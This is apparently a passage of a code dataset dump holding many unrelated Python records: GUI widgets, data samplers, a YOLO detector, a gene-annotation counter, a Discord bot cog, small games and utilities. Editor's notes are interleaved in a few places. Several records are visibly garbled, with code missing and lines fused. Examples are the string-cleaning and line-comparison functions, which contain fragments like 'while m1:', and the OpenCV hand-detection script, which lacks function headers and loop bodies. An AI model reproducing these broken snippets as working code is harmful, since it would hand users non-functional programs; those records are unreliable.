num=self.nalpha_spin.value())\n params = {\n 'alpha': alphas,\n 'fit_intercept': fit_intercept_items,\n 'verbose': [True],\n 'normalize': normalize_items,\n 'precompute': ['auto'],\n 'max_iter': [int(i) for i in self.max_iterLineEdit.text().split(',')],\n 'copy_X': [True],\n 'fit_path': [False],\n 'positive': positive_items,\n 'model': [0]\n }\n modelkey = str(params)\n return params, modelkey\n\n\nif __name__ == \"__main__\":\n import sys\n\n app = QtWidgets.QApplication(sys.argv)\n Form = QtWidgets.QWidget()\n ui = Ui_Form()\n ui.setupUi(Form)\n Form.show()\n 
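Editor's note: run() in the cv_LassoLARS widget above generates its alpha grid with np.logspace over log10 endpoints, so the candidate regularization strengths are spaced evenly across orders of magnitude rather than bunched at the top of a linear range. np.geomspace is an equivalent spelling without the log10 round-trip; a small illustrative check, not part of the GUI module.

import numpy as np

alphas_log = np.logspace(np.log10(1e-7), np.log10(1e-2), num=100)
alphas_geo = np.geomspace(1e-7, 1e-2, num=100)
assert np.allclose(alphas_log, alphas_geo)  # same grid, two spellings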
sys.exit(app.exec_())\n","sub_path":"point_spectra_gui/core/crossValidateMethods/cv_LassoLARS.py","file_name":"cv_LassoLARS.py","file_ext":"py","file_size_in_byte":2410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"187726925","text":"import sys\nfrom heapq import heappush, heappop\ninput = sys.stdin.readline\n\nn = int(input())\nheap = []\n\nfor x in range(n):\n table = list(map(int, input().split()))\n\n if x == 0:\n for t in table:\n heappush(heap, t)\n continue\n\n for t in table:\n if t > heap[0]:\n heappush(heap, t)\n heappop(heap)\n\nprint(heap[0])\n \n","sub_path":"Hangil/day09_2075_choi.py","file_name":"day09_2075_choi.py","file_ext":"py","file_size_in_byte":375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"199888955","text":"from lxml.etree import parse, SubElement, XMLParser, ElementTree, Element\nfrom argparse import ArgumentParser\nimport os\n\ndefault_xml_file_path = '/usr/share/gnome-background-properties/my-backgrounds.xml'\n\n\ndef add_wallpaper(wallpaper_file_path, xml_file_path, name_text, options_text, pcolor_text='#ffffff', scolor_text='#000000'):\n\n print('in add_wallpaper')\n\n tree = get_tree(xml_file_path)\n wallpapers = tree.getroot()\n\n if wallpaper_is_there(wallpaper_file_path, wallpapers) != []:\n print('not adding.')\n return\n\n wallpaper = SubElement(wallpapers, 'wallpaper', deleted=\"false\")\n\n name = SubElement(wallpaper, 'name')\n name.text = name_text\n filename = SubElement(wallpaper, 'filename')\n filename.text = wallpaper_file_path\n options = SubElement(wallpaper, 'options')\n options.text = options_text\n\n pcolor = SubElement(wallpaper, 'pcolor')\n pcolor.text = pcolor_text\n scolor = SubElement(wallpaper, 'scolor')\n scolor.text = scolor_text\n\n write_xml(tree, xml_file_path)\n\n\ndef get_tree(xml_file_path):\n parser = XMLParser(remove_blank_text=True)\n try:\n tree = parse(xml_file_path, parser)\n except OSError as e:\n print(e)\n print(\"Couldn't find file, creating new file.\")\n create_valid_xml(xml_file_path)\n return tree\n\n\ndef remove_wallpaper(remove_name, xml_file_path):\n\n print('in remove_wallpaper')\n\n tree = get_tree(xml_file_path)\n wallpapers = tree.getroot()\n\n results = wallpaper_is_there(remove_name, wallpapers)\n if results == []:\n print('could not find {}'.format(remove_name))\n return\n\n #found the wallpaper\n print('removing {} matches.'.format(len(results)))\n\n for wallpaper in results:\n while wallpaper.tag != 'wallpaper':\n wallpaper = wallpaper.getparent()\n wallpapers.remove(wallpaper)\n\n write_xml(tree, xml_file_path)\n\n\ndef write_xml(tree, xml_file_path):\n print('about to write to file')\n with open(xml_file_path, 'wb') as f:\n tree.write(f, pretty_print=True)\n\n\ndef create_valid_xml(xml_file_path):\n wallpapers = Element('wallpapers')\n tree = ElementTree(wallpapers)\n write_xml(tree, xml_file_path)\n\n\ndef wallpaper_is_there(search_query, wallpapers):\n\n results = []\n for desc in wallpapers.iterdescendants():\n if desc.text is not None and search_query in desc.text:\n #if desc.text == search_query:\n print('matched.')\n results.append(desc)\n return results\n\n\ndef main():\n parser = ArgumentParser()\n parser.add_argument('-a', '--add', nargs='+', type=str, help='wallpaper image file(s)', metavar=('filename_1', 'filename_2'))\n parser.add_argument('-r', '--remove', nargs='+', type=str, help='wallpaper name(s) or filename(s) to remove', metavar=('search_1', 'search_2'))\n 
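Editor's note on get_tree in the my-backgrounds.py record above: it returns tree after an OSError, but that branch never binds tree -- create_valid_xml writes the skeleton file without parsing it -- so the recovery path raises NameError. A hedged fix that re-parses the freshly written file; it only assumes the create_valid_xml helper defined in the same record.

from lxml.etree import parse, XMLParser

def get_tree_fixed(xml_file_path):
    parser = XMLParser(remove_blank_text=True)
    try:
        tree = parse(xml_file_path, parser)
    except OSError as e:
        print(e)
        print("Couldn't find file, creating new file.")
        create_valid_xml(xml_file_path)      # helper from the record above
        tree = parse(xml_file_path, parser)  # re-read the fresh skeleton
    return tree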
parser.add_argument('-x', '--xml', type=str, help='specify the output xml file', default=default_xml_file_path)\n parser.add_argument('-n', '--name', nargs='+', help='specify the wallpaper name(s) respectively for -a args', metavar=(\"'Name 1'\", \"'Name 2'\"))\n parser.add_argument('-o', '--options', nargs='+', help='specify options_text', metavar=('opt1', 'opt2'), choices=['zoom'], default=['zoom'])\n args = parser.parse_args()\n\n if args.name is None:\n args.name = []\n if args.options is None:\n args.options = []\n if args.add is not None:\n args.name = args.name + [x for x in args.add[len(args.name):]]\n args.options = args.options + ['zoom']*(len(args.name)-len(args.options))\n\n if args.remove is not None:\n for i in range(len(args.remove)):\n remove_wallpaper(args.remove[i], os.path.abspath(args.xml))\n\n if args.add is not None:\n for i in range(len(args.add)):\n add_wallpaper(os.path.abspath(args.add[i]), os.path.abspath(args.xml), args.name[i], args.options[i])\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"my-backgrounds.py","file_name":"my-backgrounds.py","file_ext":"py","file_size_in_byte":3910,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"565857736","text":"import torch\n\nfrom .distributed import DistributedSampler\nfrom .iteration_based_batch_sampler import IterationBasedBatchSampler\n\n\ndef make_data_sampler(dataset, shuffle, distributed):\n if distributed:\n return DistributedSampler(dataset, shuffle=shuffle)\n if shuffle:\n sampler = torch.utils.data.sampler.RandomSampler(dataset)\n else:\n sampler = torch.utils.data.sampler.SequentialSampler(dataset)\n\n return sampler\n\n\ndef make_batch_data_sampler(\n cfg, dataset, shuffle, distributed,\n images_per_batch, num_iters=None, start_iter=0\n):\n sampler = make_data_sampler(dataset, shuffle, distributed)\n drop_last = cfg.DATASETS.DROP_LAST\n batch_sampler = torch.utils.data.sampler.BatchSampler(\n sampler, images_per_batch, drop_last=drop_last\n )\n if num_iters is not None:\n batch_sampler = IterationBasedBatchSampler(\n batch_sampler, num_iters, start_iter\n )\n return batch_sampler\n","sub_path":"p3t/data/samplers/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":967,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"325498670","text":"import random\r\nimport characters\r\nimport time\r\n\r\n\r\n\r\n# defines the dice rolling mechanic\r\n\r\n\r\ndef roll_dice(sides):\r\n return random.randint(1, sides)\r\n\r\n\r\n\r\n\r\n\r\ndef tutorial():\r\n print(\"A thug is standing before you about to attack! 
Rolling for initiative....\")\r\n pc_init = 0\r\n npc_init = 0\r\n global att_order\r\n att_order = 0\r\n while pc_init == npc_init: # initiative roll, while pc and npc are equal, reroll\r\n pc_init = roll_dice(20)\r\n npc_init = roll_dice(20)\r\n if pc_init > npc_init:\r\n time.sleep(1)\r\n print(\"You roll a \" + str(pc_init) + \", your initiative roll was greater than your\"\r\n \" opponent's, you attack first!\")\r\n att_order = 1\r\n elif pc_init < npc_init:\r\n time.sleep(1)\r\n print(\"You roll a \" + str(pc_init) + \", you attack second!\")\r\n att_order = 2\r\n print(att_order)\r\n\r\n print(\"Lets fight!\")\r\n print(\"Select action: attack, run\")\r\n\r\n\r\ndef queueTutorial():\r\n print(\"If you would like to see the tutorial type: tutorial\")\r\n if input() == 'tutorial': #template for a combat scenario\r\n tutorial()\r\n else: print(\"You have selected not to see how the combat looks\")\r\n\r\n\r\ndef inputDice():\r\n value = [input()]\r\n print(value)\r\n\r\n\r\ndef inputRoll():\r\n\r\n acceptableDice = ['6', '8', '10', '20', '100']\r\n print(\"Lets roll some dice to test the rolling. Enter a dice to roll from the following dice: 6, 8, 10, 20, 100\")\r\n input_roll = input()\r\n\r\n while input_roll not in acceptableDice:\r\n print('You need to enter one of the above mentioned dice.')\r\n input_roll = input()\r\n else:\r\n print(\"Rolling dice.....\")\r\n time.sleep(2)\r\n roll = (int(roll_dice(int(input_roll))))\r\n print(roll)\r\n time.sleep(.5)\r\n print(\"You rolled a \" + str(roll) + \", congratulations on your first dice roll!\")\r\n\r\n\r\n# rolls against call in main.py x=modifier, y=required ability check. Example call: ability_check(Player1mod.wis, 15)\r\ndef ability_check(x,y):\r\n roll = roll_dice(20)+x\r\n if roll >= y:\r\n print(\"You successfully perform action\")\r\n else:\r\n print(\"You failed to perform action\")\r\n\r\n","sub_path":"functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":2136,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"535651748","text":"__author__ = 'ab53995'\n\n# Färger, http://www.colorpicker.com/\nBLACK = (0, 0, 0)\nROSA = ( 255, 0, 132)\n\nimport pygame\npygame.init()\n\nsize = (700, 500)\nscreen = pygame.display.set_mode(size)\n# För att få fullscreen, siffrorna är skärmens upplösning\npygame.display.set_mode((1366, 768), pygame.FULLSCREEN)\n\ndone = False\nclock = pygame.time.Clock()\n\nwhile not done:\n for event in pygame.event.get():\n # Gör att programet stängs när man trycker på en knapp\n if event.type == pygame.KEYDOWN:\n done = True\n if event.type == pygame.QUIT:\n print(\"User has asked to quit.\")\n done = True\n\n # Färgen som fyller hela fönstret\n screen.fill(ROSA)\n\n # Själva texten, siffran efter typsnittet är storleken.\n font = pygame.font.SysFont('Courier New', 300, True, False)\n text = font.render(\"QUIZ!\", True, BLACK)\n # Var på skärmen texten läggs ut\n screen.blit(text, [250, 200])\n\n # Printar allting på skärmen\n pygame.display.flip()\n # Hur många gånger per sekund som skärmen uppdateras\n clock.tick(60)\n\npygame.quit()\n","sub_path":"Test och problemlösning/mirella.py","file_name":"mirella.py","file_ext":"py","file_size_in_byte":1112,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"83796489","text":"import cv2\r\nimport numpy as np\r\n\r\ncap = cv2.VideoCapture(0)\r\nwhT = 320\r\nconfidenceThreshold = 0.5\r\nnms_threshold = 0.3\r\n\r\nclassFiles = r'E:\\Python Project\\Resources\\AI_Files\\Yolo_v3\\coco.names'\r\nclassNames = []\r\n\r\n# --- Read the Coco name file contents---\r\nwith 
open(classFiles, 'rt') as f:\r\n classNames = f.read().rstrip('\\n').rsplit('\\n')\r\n #print(classNames)\r\n #print(len(classNames))\r\n\r\n# ---Initialize the Yolo v3 names files---\r\nmodelConfiguration = r'E:\\Python Project\\Resources\\AI_Files\\Yolo_v3\\yolov3-tiny.cfg'\r\nmodelWeight = r'E:\\Python Project\\Resources\\AI_Files\\Yolo_v3\\yolov3-tiny.weights'\r\n\r\n\r\n# --- Create our network ---\r\nnet = cv2.dnn.readNetFromDarknet(modelConfiguration, modelWeight)\r\nnet.setPreferableBackend(cv2.dnn.DNN_BACKEND_OPENCV)\r\nnet.setPreferableTarget(cv2.dnn.DNN_TARGET_CPU)\r\n\r\ndef findObjects(outputs,img):\r\n hT, wT, cT = img.shape\r\n #print(img.shape) # 480, 640, 3\r\n boundingbox = []\r\n classIds = []\r\n confidenceLevel = []\r\n\r\n for output in outputs:\r\n for detect in output:\r\n scores = detect[5:] # Read the data from 5\r\n classId = np.argmax(scores) # Filter out and find the highest scores within the first 5 and takes its ID\r\n confidence = scores[classId] # Find the confidence by referring to highest schore ID\r\n\r\n if confidence > confidenceThreshold:\r\n w,h = int(detect[2]*wT), int(detect[3]*hT)\r\n x,y = int((detect[0]*wT)-w/2), int((detect[1]*hT - h/2))\r\n #print(w,h,x,y)\r\n boundingbox.append([x,y,w,h])\r\n classIds.append(classId)\r\n confidenceLevel.append(float(confidence))\r\n #print(len(boundingbox)) # Determine how many object it detects\r\n\r\n indices = cv2.dnn.NMSBoxes(boundingbox,confidenceLevel,confidenceThreshold,nms_threshold)\r\n for i in indices:\r\n i = i[0]\r\n box = boundingbox[i]\r\n x,y,w,h = box[0], box[1], box[2], box[3]\r\n #print(x,y,w,h)\r\n cv2.rectangle(img, (x, y), (x+w,y+h), (255, 0 , 255), 2)\r\n cv2.putText(img,f'{classNames[classIds[i]].upper()} {int(confidenceLevel[i]*100)}%',(x, y-10), cv2.FONT_HERSHEY_SIMPLEX, 0.6, (255, 0, 255), 2)\r\n \r\nwhile True:\r\n success, img = cap.read()\r\n\r\n # ---Convert our Capture image to Blob network---\r\n blob = cv2.dnn.blobFromImage(img, 1/255, (whT, whT), [0,0,1],1,crop=False)\r\n net.setInput(blob)\r\n #print(blob)\r\n\r\n # ---Get the name of all the layer detected from webcam --\r\n LayerNames = net.getLayerNames()\r\n #print(LayerNames)\r\n\r\n # --- Return the index of the output Layers --\r\n #print(net.getUnconnectedOutLayers())\r\n\r\n # --- We wanted to get output layer names within the Layer Names, we -1 to ---\r\n outputNames = [LayerNames[i[0]-1] for i in net.getUnconnectedOutLayers()]\r\n #print(outputNames)\r\n\r\n outputs = net.forward(outputNames)\r\n #print(outputs[0][0]) # --> Printing first row [0] only \r\n #print(outputs[0]) # --> Output for 300 rows (total detection in rows) & 85 columns 80 (coco list), 5 (cx,cy,w,h,confidence)\r\n #print(outputs[1]) # --> Output for 1200 rows (total detection in row) & 85 columns 80 (coco list), 5 (cx,cy,w,h,confidence)\r\n \r\n findObjects(outputs,img)\r\n\r\n cv2.imshow(\"Output\",img)\r\n if cv2.waitKey(1) & 0XFF == ord('q'):\r\n break\r\n\r\n\r\n","sub_path":"open_cv_yolo_v3_Person_detect.py","file_name":"open_cv_yolo_v3_Person_detect.py","file_ext":"py","file_size_in_byte":3352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"78223877","text":"\"\"\"\nThe aim of this script is to 1) count the amount of unique genes in annotated bed files and 2) to provide\nthe list of these unique genes. The annotated bed-file is first imported as a data frame and the gene names\nare distinguished by splitting the annotation column by \"_\". 
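Editor's note: findObjects in the YOLO record above converts each detection from YOLO's normalized (cx, cy, w, h) center format into the pixel-space top-left (x, y, w, h) that cv2.rectangle and cv2.dnn.NMSBoxes expect. That conversion as a standalone helper, sketched under the same single-detection layout (the first four values are normalized box coordinates).

def yolo_box_to_xywh(detect, frame_w, frame_h):
    # detect[0:4] = normalized center-x, center-y, width, height
    w = int(detect[2] * frame_w)
    h = int(detect[3] * frame_h)
    x = int(detect[0] * frame_w - w / 2)  # shift the center to a top-left corner
    y = int(detect[1] * frame_h - h / 2)
    return x, y, w, h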
The duplicated gene names are then dropped\nand the number of unique genes is calculated.\n\nTo run the script, provide the path to the gene annotated bed-file in the --input flag and write the absolute\npath and the name of the output file in the --output flag. Write \"python calculate_genes.py --help\" for more info.\n\n\"\"\"\n\nimport pandas as pd\nimport click\nimport re\n\n\ndef read_bed_file(input_path):\n '''\n input: string\n\n output: DataFrame\n\n The function will read an absolute path where the annotated gene bed-file is located and will create\n a new DataFrame and add a header, which will be the output.\n\n '''\n # Header to be used\n column_header = ['chr', 'start', 'end', 'annotation']\n\n # Open the input file as tab-separated csv.\n with open(input_path) as f:\n df = pd.read_csv(f, names=column_header, sep = '\\t')\n\n return df\n\n\ndef splitting(df):\n\n '''\n input: DataFrame\n\n output: DataFrame\n\n This function will first create a new dataframe from the annotation column and then split the gene\n name from the tx and exon numbers. The duplicates are then dropped and the index reset.\n '''\n\n # Create df with only the annotation column\n annotation_df = pd.DataFrame(data = df.loc[:,'annotation'])\n\n # split() on all '|' in annotation col and paste the results transposed by explode() and drop duplicates.\n split_pipe_df = annotation_df.annotation.str.split('|').explode().drop_duplicates()\n\n # Reset index to also include the col name and remove the extra 'index' col\n reset_index_pipe_df = split_pipe_df.reset_index().drop(['index'], axis = 1)\n\n # Repeat the above command to split() on ',' to be able to extract the genes in the end of\n # each line in the annotated bed-file\n split_comma_df = reset_index_pipe_df.annotation.str.split(',').explode().drop_duplicates()\n reset_index_comma_df = split_comma_df.reset_index().drop(['index'], axis = 1)\n\n return reset_index_comma_df\n\ndef unique_genes(df):\n\n '''\n input: DataFrame\n\n output: DataFrame\n\n Here, all tx (which start with either NM_ or NR_) are extracted to a new df. The index numbers\n are then identified and the tx are dropped from the original input df according to those indexes.\n '''\n\n # assign() will add an extra column and will overwrite the 'annotation' col since the same variable 'annotation ='\n # is used. str.findall() will return values in a list, where '.._' matches all tx prefixes; the re.S flag\n # belongs inside findall(). Values that do not match are marked as NaN. explode() un-nests the list format\n tx_df = df.assign(annotation=df['annotation'].str.findall('.._', flags=re.S)).explode('annotation')\n\n # Get the indexes with tx prefixes and '.' in the annotation column\n tx_index = tx_df[tx_df['annotation'].str.contains('_') == True].index\n dot_index = df[df['annotation'] == '.'].index\n # Add all the above indexes to the all_index variable to drop all rows at once\n all_index = tx_index.append([dot_index])\n\n # Drop the index number with '.' 
value, avoid the old index being added as a column by setting drop=True\n final_df = df.drop(all_index).reset_index(drop=True)\n\n return final_df\n\n\ndef write_output(df, output):\n\n '''\n input: DataFrame\n\n output: DataFrame, integer\n '''\n\n # The index column and header are dropped.\n output_df = df.to_csv(output, header=False, index=False)\n\n # nunique() calculates the unique nr of genes.\n unique_genes = df.nunique(axis=0)\n\n print (\"The unique gene count for \", unique_genes)\n return output_df\n\n\n# Using click package to provide the absolut path for the input and output file\n@click.command()\n@click.option('--input', type = click.Path(exists=True), required = True, help = 'path to gene annotated bed-file')\n@click.option('--output', type = click.Path(), required = True, help = 'name and path for the output file' )\n\n\ndef main(input, output):\n\n # Create df from input bed-file\n read_df = read_bed_file(str(input))\n\n split_the_df = splitting(read_df)\n\n get_unique_gene_df = unique_genes(split_the_df)\n\n # wriring an output file of the unique genes.\n write_output(get_unique_gene_df, output)\n\nif __name__ == '__main__':\n main()\n","sub_path":"utilities/annotate_bed_table/calculate_genes.py","file_name":"calculate_genes.py","file_ext":"py","file_size_in_byte":4506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"348237152","text":"#!/usr/bin/env python3\r\n#-*- coding: utf-8 -*-\r\n\"\"\"\r\n@author: zdy93\r\n\"\"\"\r\nfrom absl import app, flags\r\nimport re\r\nimport os\r\nimport requests\r\nfrom xml.dom import minidom\r\nimport time\r\n\r\nflags.DEFINE_string('youtube_url', None, 'Youtube video url, example: https://www.youtube.com/watch?v=mhIeiUbH2gg')\r\nflags.DEFINE_string('dir', None, 'Output File Directories, example: H:\\MyDanmakuFiles')\r\nflags.DEFINE_string('name', None, 'output file Names, example: mydanmaku')\r\nflags.mark_flag_as_required('youtube_url')\r\n\r\nFLAGS = flags.FLAGS\r\n\r\n\r\ndef main(argv):\r\n del argv\r\n url = FLAGS.youtube_url\r\n out_dir = FLAGS.dir\r\n filename = FLAGS.name\r\n y2b(youtube_url=url, out_dir=out_dir, filename=filename)\r\n\r\n\r\ndef y2b(youtube_url, out_dir=None, filename=None):\r\n assert re.search(\"www.youtube.com/watch\\?v=\", youtube_url) is not None, \"It is not a youtube video link\"\r\n video_id = youtube_url.split(\"v=\")[1]\r\n url = \"https://serene-hollows-62567.herokuapp.com/api/v3/comments/\"+video_id\r\n try:\r\n jpage = requests.get(url)\r\n except:\r\n print(\"Connection Failed\")\r\n else:\r\n jfile = jpage.json()\r\n assert len(jfile['data']['comments'])>=1, \"No comment available\"\r\n doc = minidom.Document()\r\n root = doc.createElement('i')\r\n doc.appendChild(root)\r\n new_max_limit = str(len(jfile['data']['comments']))\r\n elelist = [('chatserver', 'chat.bilibili.com'), ('chatid', video_id),\r\n ('mission', '0'), ('maxlimit', new_max_limit),\r\n ('state', '0'), ('real_name', '0'), ('source', 'k-v')]\r\n for ele in elelist:\r\n new_e = doc.createElement(ele[0])\r\n new_e.appendChild(doc.createTextNode(ele[1]))\r\n root.appendChild(new_e)\r\n for i in jfile['data']['comments']:\r\n p_list = []\r\n stime = \"%.5f\"%(float(i['stime'])/1000.0)\r\n p_list.append(stime)\r\n p_list.append(str(i['mode']))\r\n p_list.append('25')\r\n p_list.append(str(i['color']))\r\n p_list.append(str(int(time.time())))\r\n p_list.append(\"0\")\r\n p_list.append(str(i['user_id']))\r\n p_list.append(str(i['comment_id']))\r\n new_d = doc.createElement('d')\r\n 
new_d.setAttribute('p', ','.join(p_list))\r\n new_d.appendChild(doc.createTextNode(i['text']))\r\n root.appendChild(new_d)\r\n if out_dir is None:\r\n if filename is None:\r\n output_file = video_id+'.xml'\r\n else:\r\n output_file = filename+'.xml'\r\n else:\r\n if not os.path.exists(out_dir):\r\n os.mkdir(out_dir)\r\n if filename is None:\r\n output_file = video_id + '.xml'\r\n output_file = os.path.join(out_dir, output_file)\r\n else:\r\n output_file = filename + '.xml'\r\n output_file = os.path.join(out_dir, output_file)\r\n with open(output_file, 'w', encoding=\"utf-8\") as fp:\r\n doc.writexml(fp, indent='\\t', addindent='\\t', newl='\\n', encoding='utf-8')\r\n print(\"Finished, the output file is %s\" % output_file)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n app.run(main)\r\n","sub_path":"Y2B.py","file_name":"Y2B.py","file_ext":"py","file_size_in_byte":3244,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"608670547","text":"def suppression_espace_string(string):\n liste=list(string)\n m=0\n while m1:\n liste.pop(-1)\n if len(liste)>0:\n string=liste[0] #on passe d'une liste de string à un string : [\"machin\"] -> \"machin\"\n return string\n\n\n\n\ndef fraude_lignes(path1,path2):\n with open(path1,'r') as code1:\n with open(path2,'r') as code2:\n code1_list=list(code1)\n code2_list=list(code2)\n #on supprime d'abord les espaces préliminaires dans les lignes\n for i in range(len(code1_list)):\n code1_list[i]=suppression_espace_string(code1_list[i])\n for i in range(len(code2_list)):\n code2_list[i]=suppression_espace_string(code2_list[i])\n #on crée result qui sera une liste de couple contenant la ligne présente dans les deux dossiers et le nombre de fois qu'on les retrouve\n result=[]\n for i in range(len(code1_list)):\n if code1_list[i] in code2_list and code1_list[i] not in result:\n #la ligne est dans le 2ème code mais pas déja compté dans result\n result.append([code1_list[i],1])\n elif code1_list[i] in code2_list :\n #la ligne est dans code2 et dans result donc on cherche l'endroit dans result et on incrémente\n k=0\n while code1_list[i]!=result[k][0] and k max_area:\n\t\t\tmax_area = area\n\t\t\tmax_i = i\n\n\tcontour = contours[max_i]\n\treturn contour\ndef draw_centroid(contour):\n\tmoments = cv2.moments(contour)\n\tif moments['m00'] != 0:\n\t\tcx = int(moments['m10']/moments['m00'])\n\t\tcy = int(moments['m01']/moments['m00'])\n\t\treturn (cx,cy)\n\telse:\n\t\treturn None\t\ndef draw_defects(contour):\n\thull = cv2.convexHull(contour, returnPoints=False)\n\tif hull is not None and len(hull > 3) and len(contour) > 3:\n\t\tdefects = cv2.convexityDefects(contour, hull)\t\n\t\treturn defects\n\telse: \n\t\treturn None\ndef draw_farthest_point(defects, contour, centroid):\n\ts = defects[:,0][:,0]\n\tcx, cy = centroid\n\t\n\tx = np.array(contour[s][:,0][:,0], dtype=np.float)\n\ty = np.array(contour[s][:,0][:,1], dtype=np.float)\n\t\t\t\t\n\txp = cv2.pow(cv2.subtract(x, cx), 2)\n\typ = cv2.pow(cv2.subtract(y, cy), 2)\n\tdist = cv2.sqrt(cv2.add(xp, yp))\n\n\tdist_max_i = np.argmax(dist)\n\n\tif dist_max_i < len(s):\n\t\tfarthest_defect = s[dist_max_i]\n\t\tfarthest_point = tuple(contour[farthest_defect][0])\n\t\treturn farthest_point\n\telse:\n\t\treturn None\t\n\ndef draw_hull(contour):\n\thull = cv2.convexHull(contour)\n\treturn hull\ndef draw_final(frame, hist): \n hand_masked = apply_hist_mask(frame, hist)\n\n contours= draw_contours(hand_masked)\n if contours is not None and len(contours) > 0:\n max_contour = 
draw_max_contour(contours)\n hull = draw_hull(max_contour)\n centroid = draw_centroid(max_contour)\n defects = draw_defects(max_contour)\n\n if centroid is not None and defects is not None and len(defects) > 0: \n farthest_point = draw_farthest_point(defects, max_contour, centroid)\n\n if farthest_point is not None:\n plot_farthest_point(frame, farthest_point)\n plot_centroid(frame,centroid)\ndef plot_farthest_point(frame, point):\n\t\tcv2.circle(frame, point, 5, [0,0,255], -1)\ndef plot_centroid(frame, point):\n\t\tcv2.circle(frame, point, 5, [255,0,0], -1)\n\nif __name__ == '__main__':\n import sys\n import getopt\n import numpy as np\n\t\n\nframe = sys.argv[1]\nbase = sys.argv[2]\nprint (frame)\nimg = cv2.imread(frame)\nbase = cv2.imread(sys.argv[2])\nimg,_,_ = draw_hand_rect(base)\nhist=set_hand_hist(img)\nres=apply_hist_mask(img,hist)\ncv2.imshow('image',res)\ncv2.imshow('image',img)\ndraw_final(res,hist)\ncv2.imshow('image',res)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n\n","sub_path":"traitement_dimage/detection/detection.py","file_name":"detection.py","file_ext":"py","file_size_in_byte":5145,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"514238526","text":"import discord\nfrom discord.ext import commands\nfrom core import checks\nfrom core.models import PermissionLevel\n\nclass Quote(commands.Cog):\n \"\"\"\n Let's you send a quote to a designated channel.\n \"\"\"\n def __init__(self, bot):\n self.bot = bot\n self.coll = bot.plugin_db.get_partition(self)\n\n @commands.command(aliases = ['qu'])\n @checks.has_permissions(PermissionLevel.ADMIN)\n async def setquotechannel(self, ctx, channel: discord.TextChannel):\n \"\"\"\n Set the channel where quotes go.\n \"\"\"\n await self.coll.find_one_and_update(\n {\"_id\": \"config\"},\n {\"$set\": {\"quote-channel\": {\"channel\": str(channel.id)}}},\n upsert=True,\n )\n embed=discord.Embed(title=f'Set quote channel to {channel}.', color=0x4dff73)\n embed.set_author(name=\"Success!\")\n embed.set_footer(text=\"Task succeeded successfully.\")\n await ctx.send(embed=embed)\n\n @commands.command()\n async def quote(self, ctx, *, quote):\n \"\"\"\n Quote something!\n \"\"\"\n async with ctx.channel.typing():\n config = await self.coll.find_one({\"_id\": \"config\"})\n if config is None:\n embed=discord.Embed(title=\"quote channel not set.\", color=self.bot.error_colour)\n embed.set_author(name=\"Error.\")\n embed.set_footer(\"Task failed successfully.\")\n await ctx.send(embed=embed)\n else:\n quote_channel = self.bot.get_channel(int(config[\"quote-channel\"][\"channel\"]))\n await quote_channel.send(\"<@&687701012357578820>\");\n embed=discord.Embed(title=quote, color=self.bot.main_color)\n embed.set_author(name=f\"Quote sent by {ctx.author}:\", icon_url=ctx.author.avatar_url)\n await quote_channel.send(embed=embed)\n \n await ctx.message.add_reaction('\\N{WHITE HEAVY CHECK MARK}')\n\ndef setup(bot):\n bot.add_cog(Quote(bot))\n","sub_path":"quote/quote.py","file_name":"quote.py","file_ext":"py","file_size_in_byte":2006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"332208079","text":"from django.conf.urls import url\nfrom django.contrib import admin\nfrom article import views\nfrom article.views import RSSFeed\n\nurlpatterns = [\n\n url(r'^admin/', admin.site.urls),\n url(r'^$', views.home, name = 'home'),\n url(r'^(?P\\d+)/$',views.detail,name='detail'),\n url(r'^archives/$', views.archives, name = 'archives'),\n 
url(r'^aboutme/$', views.about_me, name ='about_me'),\n url(r'^tag(?P\\w+)/$', views.search_tag, name = 'search_tag'),\n url(r'^search/$',views.blog_search,name = 'search'),\n url(r'^feed/$', RSSFeed(), name = \"RSS\"), #add urlconf,and set name as RSS,so we can use the url in model\n ]\n","sub_path":"my_blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":642,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"542827251","text":"import csv\nimport numpy as np\nimport numpy.matlib\nfrom netCDF4 import Dataset\nimport pickle\nimport matplotlib.pyplot as plt\nimport matplotlib as mpl\nimport cartopy.crs as ccrs\nimport cartopy\n\ndata_path= '/data/cloud/Goldtimes5/data/SPCAM/CPL64/'\n#=== load data\nCCWm_file= data_path+'CCW_gridmean.pk'\nCCWv_file= data_path+'CCW_gridvar.pk'\nCCWa_file= data_path+'CCW_aggrgate.pk'\nCAPE_file= data_path+'CAPE.pk'\nRH_file= data_path+'RHmid.pk'\nMSE_file= data_path+'MSE_sur.pk'\n\nwith open(CCWm_file, 'rb') as f:\n CCWm= pickle.load(f)\n\nwith open(CCWv_file, 'rb') as f:\n CCWv= pickle.load(f)\n\nwith open(CCWa_file, 'rb') as f:\n CCWa= pickle.load(f)\n\nwith open(CAPE_file, 'rb') as f:\n CAPE= pickle.load(f)\n\nwith open(RH_file, 'rb') as f:\n RH= pickle.load(f)\n\nwith open(MSE_file, 'rb') as f:\n MSE= pickle.load(f)\n\n#CCWa[np.isnan(CCWa)]=50\n#CaL= (CCWa==np.amax(CCWa))\n#CaS= (CCWa==np.amin(CCWa))\n#CAPE[~CaL]= np.mean(np.mean(np.mean(np.squeeze(CAPE),0),0),0)\n#CAPE[~CaS]= np.mean(np.mean(np.mean(np.squeeze(CAPE),0),0),0)\n#RH[~CaL]= 